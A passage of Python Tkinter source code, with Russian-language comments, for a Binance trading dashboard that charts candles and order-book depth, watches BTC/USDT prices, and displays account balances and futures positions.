elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue")
elif prSt < 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue")
yp=1180
ypi=0
while yp > -500:
points=[]
yp = 1180 - ypi*12*4#12*4=1hour
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+36000-ypi*3600
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%H:%M")
app.graph_Tb.create_text(1180 - ypi*48,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*48,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1Sp)):
myDicGr1TT = myDicGr1Sp[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#print (len(myDicGr1))
for mm in range(len(myDicGr1Ft)):
myDicGr1TT = myDicGr1Ft[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 696 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
# print (xxp,yyp1,yyp2,yyp3,yyp4)
if xxp > 1000:
app.graph_Sm.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "black"
else:
flc="black"
app.graph_Sm.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Sm.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5_Ft))):
if float(mylist5_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5_Ft[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
if float(mylist4_Ft[m][1])>(grOW/20):
points=[]
x0 = 180
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4_Ft[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
if m==0:
y0 = grMd - ((float(mylist4_Ft[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Sm.coords(GAP_Sp, -500, y0, 800, y0)
app.graph_Sm.itemconfigure(GAP_SpT,text=float(mylist4_Ft[m][0]))
#______________Таймер наблюдателя BTC/USDT
class Timer_BTCUSDT:
def __init__(self):
global TE_BU
while True:
if PS_BU == False:
sys_msg = ' Наблюдатель BTC/USDT остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_BU = True
break
if should_run_BU:
for i in range(400):
if not should_run_BU:
#print('Stopped...')
ss_BU = 'Stopped...' + '\n BTC/USDT watcher'
app.label_BU.config(text = ss_BU)
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
sys_msg = ' Наблюдатель BTC/USDT будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_BU:
if i==0:
sys_msg = ' Наблюдатель BTC/USDT запущен.'
app.Sys_Msg(text1=sys_msg)
TE_BU = False
if i > 0:
time.sleep(0.5)
myTupSpK =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=5)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI_Sp_0=0
yI_Sp_1=0
for ii in range(len(myDicGr1Sp)):
if ii == 0:
yI_Sp_1=float(myDicGr1Sp[ii][3])
if float(myDicGr1Sp[ii][2])>yI_Sp_0:
yI_Sp_0=float(myDicGr1Sp[ii][2]) #High
if float(myDicGr1Sp[ii][2])<yI_Sp_1:
yI_Sp_1=float(myDicGr1Sp[ii][3]) #Low
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=5)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI_Ft_0=0
yI_Ft_1=1
for ii in range(len(myDicGr1Ft)):
if ii == 0:
yI_Ft_1=float(myDicGr1Ft[ii][3])
if float(myDicGr1Ft[ii][2])>yI_Ft_0:
yI_Ft_0=float(myDicGr1Ft[ii][2]) #High
if float(myDicGr1Ft[ii][2])<yI_Ft_1:
yI_Ft_1=float(myDicGr1Ft[ii][3]) #Low
ss_BU = 'SPOT: xx%, FUTURES xx%'
myTup_DSp = ('depth', bot.depth(symbol='BTCUSDT', limit=5)) #tupl
#print('SPOT D',myTup_DSp)
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol='BTCUSDT', limit=5)) #tupl
#print('FT D',myTup_DFt)
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%H:%M:%S] ")
xx1 = (float(mylist4_Sp[0][0])-yI_Sp_0)/(float(mylist4_Sp[0][0])/100)
ss_BU = time_local_str + 'SPOT: ' + "%.2f" % (xx1) + '%, '
xx2 = (float(mylist4_Ft[0][0])-yI_Ft_0)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx2) + '%, '
xx3 = (float(mylist4_Sp[0][0])-yI_Sp_1)/(float(mylist4_Sp[0][0])/100)
ss_BU += '\n' + time_local_str + 'SPOT: ' + "%.2f" % (xx3) + '%, '
xx4 = (float(mylist4_Ft[0][0])-yI_Ft_1)/(float(mylist4_Ft[0][0])/100)
ss_BU += 'FRS: ' + "%.2f" % (xx4) + '%, '
app.label_BU.config(text = ss_BU)
if (xx3<0 and xx4<0) or ((xx1<-0.25 and xx2<-0.25) and (-xx1>xx3 and -xx2>xx4)):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='pink'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='red'
elif (xx1>0 and xx2>0) or ((xx3>0.25 and xx4>0.25)and (xx3>(-xx1) and xx4>(-xx2))):
if app.label_BU['bg']=='SystemButtonFace':
app.label_BU['bg']='lightgreen'
app.label_BU['fg']='SystemButtonText'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='green'
else:
app.label_BU['bg']='SystemButtonFace'
app.label_BU['fg']='SystemButtonText'
#______________Таймер наблюдателя балансов
class Timer_AccBlns:
def __init__(self):
global TE_AB
i=0
while True:
if PS_AB == False:
sys_msg = ' Наблюдатель балансов остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_AB = True
break
if should_run_AB:
#for i in range(400):
if not should_run_AB:
#print('Stopped...')
sys_msg = ' Наблюдатель балансов будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_AB:
if i==0:
sys_msg = ' Наблюдатель балансов запущен.'
app.Sys_Msg(text1=sys_msg)
TE_AB = False
if i > 0:
time.sleep(0.5)
BnAcc = bot.account()
BnAcc10 = BnAcc['balances']
ss = 'SPOT баланс: ' #0 USDT'
#print(BnAcc10)
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if BnAcc101['asset'] =='USDT':
#print (BnAcc10[mm])
ss += str(BnAcc101['asset']) + "\nДоступно: " + str(BnAcc101['free']) + "USDT.\nНе доступно: " + str(BnAcc101['locked']) + ' USDT.'
app.label_BlnsSpt.config(text = ss)
BnFAcc = bot.futuresBalance()
#print(BnFAcc)
ss = 'FUTURE баланс: ' #0 USDT'
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
#print(BnFAcc[mm])
ss += str(BnFAcc1['asset']) + '.'
ss += "\nВсего: " + str(BnFAcc1['balance']) + ".\nДоступно: " + str(BnFAcc1['withdrawAvailable'])
app.label_2.config(text = ss)
BnFAcc = bot.futuresAccount()
#print(BnFAcc)
ss = 'FUTURES позиции:\n'
if len(BnFAcc)>0:
BnFAcc1 = BnFAcc['totalUnrealizedProfit']
ss += 'PnL: ' + str(BnFAcc1) + ' USDT'
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str_H=time_local_time.strftime("%H")
ss += '\n'
if float(time_local_str_H)>=11 and float(time_local_str_H)<=19:
ss += 'Лондон '
if (float(time_local_str_H)>=16 and float(time_local_str_H)<=23) or float(time_local_str_H)==0:
ss += 'Нью-Йорк '
if float(time_local_str_H)>=0 and float(time_local_str_H)<=8: #1..9
ss += 'Сидней '
if float(time_local_str_H)>=2 and float(time_local_str_H)<=10: #3..11
ss += 'Токио '
app.label_PnL.config(text = ss)
BnFAcc=bot.userPositionInfo()
TrSc_P = app.Tree_Pos_VScrl.get()
TrSc_P=app.Tree_Pos.yview()
#print(TrSc_P)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
l = TP_CC+1
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if len(BnFAcc1)>0:
TP_SCh = True
if TP_CC > 0:
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
if TP_It[1] == str(BnFAcc1['symbol']) and TP_It[0] == str(BnFAcc1['positionSide']):
app.Tree_Pos.item(nn, values=(str(BnFAcc1['positionSide']),str(BnFAcc1['symbol']),str(BnFAcc1['leverage']),str(BnFAcc1['unRealizedProfit']),
str(BnFAcc1['entryPrice']),str(BnFAcc1['markPrice']),str(BnFAcc1['liquidationPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))))
TP_SCh = False
#print(TP_It[0])
if TP_SCh == True and float(BnFAcc1['positionAmt']) != 0:
#print(TP_It)
#print(str(BnFAcc1['symbol']),str(BnFAcc1['unRealizedProfit']),str(BnFAcc1['positionSide']))
app.Tree_Pos.insert(parent='',index='end',iid=l,text='',values=(str(BnFAcc1['positionSide']),str(BnFAcc1['symbol']),str(BnFAcc1['leverage']),str(BnFAcc1['unRealizedProfit']),
str(BnFAcc1['entryPrice']),str(BnFAcc1['markPrice']),str(BnFAcc1['liquidationPrice']),
str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))))
l +=1
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
TP_Tpl_Tmp=[]
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
TP_Tpl_Tmp.append(app.Tree_Pos.item(nn)["values"])
#print(TP_Tpl_Tmp[nn-1])
#print(len(app.Tree_Pos.get_children()))
kk=0
nm=False
for nn in range(1,TP_CC+1):
TP_It = app.Tree_Pos.item(nn)["values"]
if float(TP_It[3]) == 0 and float(TP_It[4]) == 0 and kk<=len(TP_Tpl_Tmp):
nm=True
km=False
for mm in range(kk,len(TP_Tpl_Tmp)):
#print(mm)
if float(TP_Tpl_Tmp[mm][3])!=0 and float(TP_Tpl_Tmp[mm][4])!=0 and km==False:
app.Tree_Pos.item(nn, values=(TP_Tpl_Tmp[mm][0],TP_Tpl_Tmp[mm][1],TP_Tpl_Tmp[mm][2],TP_Tpl_Tmp[mm][3],TP_Tpl_Tmp[mm][4],TP_Tpl_Tmp[mm][5],TP_Tpl_Tmp[mm][6],TP_Tpl_Tmp[mm][7]))
kk=mm+1
#print(nn,kk,mm)
km=True
if nm==True and km==False:
kk=len(TP_Tpl_Tmp)+1
else:
#print(nn,kk)
if nm==True and kk<TP_CC:
app.Tree_Pos.item(nn, values=(TP_Tpl_Tmp[kk][0],TP_Tpl_Tmp[kk][1],TP_Tpl_Tmp[kk][2],TP_Tpl_Tmp[kk][3],TP_Tpl_Tmp[kk][4],TP_Tpl_Tmp[kk][5],TP_Tpl_Tmp[kk][6],TP_Tpl_Tmp[kk][7]))
kk +=1
if kk>len(TP_Tpl_Tmp) and nn<=TP_CC+1:
app.Tree_Pos.delete(nn)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
for nn in range(1,TP_CC+1):
app.Tree_Pos.item(nn, tags=())
TP_Tpl_Tmp=app.Tree_Pos.item(nn)["values"]
if float(TP_Tpl_Tmp[3]) > 0:
app.Tree_Pos.item(nn,tags=('plus'))
elif float(TP_Tpl_Tmp[3]) <0:
app.Tree_Pos.item(nn,tags=('minus'))
app.Tree_Pos.tag_configure('plus', background='#d6f8d6')
app.Tree_Pos.tag_configure('minus', background='#fce7e7')
app.Tree_Pos.yview_moveto((TrSc_P[0]))
#print(TrSc_P[0])
if i == 0:
i = 1
#______________Таймер графика ордеров в стакане
class Timer_OrdTmr:
def __init__(self):
global TE_OrdTmr
while True:
if PS_OT == False:
sys_msg = ' График ордеров в стакане ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = True
break
if should_run_OT:
for i in range(400):
if not should_run_OT:
sys_msg = ' График ордеров в стакане ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OT:
if i==0:
sys_msg = ' График ордеров в стакане ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
TE_OrdTmr = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=1000)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2; LIMIT=100 WEIGHT = 5;LIMIT=500 WEIGHT = 10;LIMIT=1000 WEIGHT = 20)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=1000)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#Order Book Graph
app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
if (float(mylist5[m][1])*float(mylist5[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=(grSt/10))
for m in range (int(len(mylist4))):
if float(mylist4[m][1])>0:
if (float(mylist4[m][1])*float(mylist4[m][0]))>50000:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-y0I_TP)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=(grSt/10))
#______________Таймер графика Zoom ордеров в стакане
class Timer_Zoom:
def __init__(self):
global ss
global yI
global Lo
global yI0Zm
global TE_Zm
while True:
if Ord_Zm == False:
sys_msg = ' Zoom ордеров ' + grSmb + ' остановлен.'
app.Sys_Msg(text1=sys_msg)
TE_Zm = True
break
if should_run_OZ:
for i in range(400):
if not should_run_OZ:
sys_msg = ' Zoom ордеров ' + grSmb + ' будет остановлен.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_OZ:
if i==0:
TE_Zm = False
sys_msg = ' Zoom ордеров ' + grSmb + ' запущен.'
app.Sys_Msg(text1=sys_msg)
if i > 0:
time.sleep(0.01)
#Ссылка для просмотра в браузере: https://api.binance.com/api/v1/depth?symbol=ETHBTC
#limit - кол-во возвращаемых записей от 5 до 1000 (по умолчанию 100).
#Допустимые значения: 5, 10, 20, 50, 100, 500, 1000.
#Еще можно указать 0, но он может вернуть большое кол-во данных.
#Вес зависит от параметра limit. При лимите от 5 до 100 вес будет равен 1.
#Для параметра 500 вес составит 5. Для параметра 1000 вес будет 10.
#print (grSmb)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=20)) #tupl
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
#print (mylist4)
if i==0:
yI0Zm=float(mylist4[19][0])
grMd = grH/2
grSt = grZm/(yI0Zm*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
grStZ=1000/40
#Order Book Graph
app.graph_Zm.delete("all")
yI0Zm=float(mylist4[0][0])
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/200))*10
y1 = grMd - ((float(mylist5[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="pink",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist5[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist5[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist5[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist5[m][0]))
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/200))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0Zm)/prSt)* grStZ
pp=(x1,y1)
points.append(pp)
app.graph_Zm.create_line(points,fill="lightgreen",width=grStZ)
if prSt >= 0.1:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.1 > prSt >= 0.01:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.2f" % float(mylist4[m][0]))
elif 0.01 > prSt >= 0.001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.3f" % float(mylist4[m][0]))
elif 0.001 > prSt >= 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist4[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist4[m][0]))
#______________Таймер проверки запущенных Deamon процессов перед завершением работы программы
class Timer_End:
def __init__(self):
while True:
if TE_Tck==True and TE_Cnd == True and TE_CndSm == True and TE_BU == True and TE_AB == True and TE_Zm == True and TE_OrdTmr == True:
root.destroy()
break
time.sleep(0.01)
#______________Завершение работы с программой (кнопка закрыть окно)
def close_window():
global ep
global should_run_T
global should_run_C
global should_run_S
global should_run_BU
global should_run_AB
global should_run_OT
global should_run_OZ
global PS1
global PS_BU
global PS_AB
global PS_OT
global Ord_Zm
ep=messagebox.askokcancel(title=None, message='Вы действительно хотите выйти из программы?')
if ep==True:
should_run_T=False
PS1 = True
should_run_C=False
should_run_S=False
should_run_BU=False
PS_BU = False
should_run_AB=False
PS_AB = False
should_run_OT=False
PS_OT = False
should_run_OZ=False
Ord_Zm = False
TEPr = threading.Thread(target=Timer_End,daemon=True)
TEPr.start()
#______________BUTTON 1_CLICK BEGIN - Start/Stop TICK/CANDLE GRAPH
def click_button1():
global should_run_T
global should_run_C
global should_run_S
global myFont
global PS1
#print(GS)
myFont = font.Font(size=15)
app.button_1['font'] = myFont
if GS == 'TICK':
if should_run_T == True:
should_run_T = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Включить", fg='green')
else:
PS1 = False
t1 = threading.Thread(target=Timer_Tick,daemon=True)
t1.start()
app.button_1.config(text="Выключить", fg='red')
should_run_T = True
elif GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Включить", fg='green')
else:
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Выключить", fg='red')
should_run_C = True
elif GS == 'CANDLE SUMM':
if should_run_S == True:
should_run_S = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Включить", fg='green')
else:
PS1 = False
timer_3_CSumm = threading.Thread(target=Timer_Candle_Summ,daemon=True)
timer_3_CSumm.start()
app.button_1.config(text="Выключить", fg='red')
should_run_S = True
#______________BUTTON 1_CLICK END - Start/Stop TICK/CANDLE GRAPH
#______________BUTTON 2_CLICK BEGIN - Start/Stop BTC WATCHER
def click_button2():
global PS_BU
global should_run_BU
myFont = font.Font(size=10)
app.button_2['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_BU == True and should_run_BU == True:
PS_BU = False
should_run_BU = False
app.button_2.config(text="Вкл.", fg='green')
elif PS_BU == False and should_run_BU == False:
PS_BU = True
should_run_BU = True
timer_BU = threading.Thread(target=Timer_BTCUSDT,daemon=True)
timer_BU.start()
app.button_2.config(text="Выкл.", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER
#______________BUTTON AB_CLICK BEGIN - Start/Stop ACCOUNT BALANCES WATCHER + FUTURES POSITIONS WATCHER
def click_buttonAB():
global PS_AB
global should_run_AB
myFont = font.Font(size=10)
app.button_AB['font'] = myFont
#print (PS_AB, should_run_AB)
if PS_AB == True and should_run_AB == True:
PS_AB = False
should_run_AB = False
app.button_AB.config(text="Вкл.", fg='green')
elif PS_AB == False and should_run_AB == False:
PS_AB = True
should_run_AB = True
timer_AB = threading.Thread(target=Timer_AccBlns,daemon=True)
timer_AB.start()
app.button_AB.config(text="Выкл.", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER + FUTURES WALLET WATCHER
#______________BUTTON OrdTmr_CLICK BEGIN - Start/Stop DEPTH TIMER
def click_button_OrdTmr():
global PS_OT
global should_run_OT
myFont = font.Font(size=10)
app.button_OrdTmr['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_OT == True and should_run_OT == True:
PS_OT = False
should_run_OT = False
app.button_OrdTmr.config(text="Вкл. ордера", fg='green')
elif PS_OT == False and should_run_OT == False:
PS_OT = True
should_run_OT = True
timer_OT = threading.Thread(target=Timer_OrdTmr,daemon=True)
timer_OT.start()
app.button_OrdTmr.config(text="Выкл. ордера", fg='red')
#______________BUTTON OrdTmr_CLICK END - Start/Stop DEPTH TIMER
#______________BUTTON Zm_CLICK BEGIN - Start/Stop DEPTH ZOOM
def click_button_Zm():
global Ord_Zm
global should_run_OZ
wh = root.winfo_height()
ww = root.winfo_width()
if Ord_Zm == False:
should_run_OZ = True
Ord_Zm = True
app.graph_Zm.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_2.place_forget()
app.button_Ord.config(text="выкл. Zoom")
timer_Zm = threading.Thread(target=Timer_Zoom,daemon=True)
timer_Zm.start()
else:
should_run_OZ = False
Ord_Zm = False
app.button_Ord.config(text="вкл. Zoom")
app.graph_2.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_Zm.place_forget()
#______________BUTTON Zm_CLICK END - Start/Stop DEPTH ZOOM
#______________BUTTON NwOL_CLICK BEGIN (New Order Long) - SET NEW LONG FUTURES ORDER
def click_buttonNwOL():
#Close position By default the futures keeps the position mode to One-way. In order to enable the new feature of Hedge Mode, so you can have dual sides positions.
#enable it by endpoint POST /fapi/v1/positionSide/dual, setting the parameter dualSidePosition = true
#Open position: Long : positionSide=LONG, side=BUY Short: positionSide=SHORT, side=SELL
#Close position: Close long position: positionSide=LONG, side=SELL Close short position: positionSide=SHORT, side=BUY
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f,' ', orLSS)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
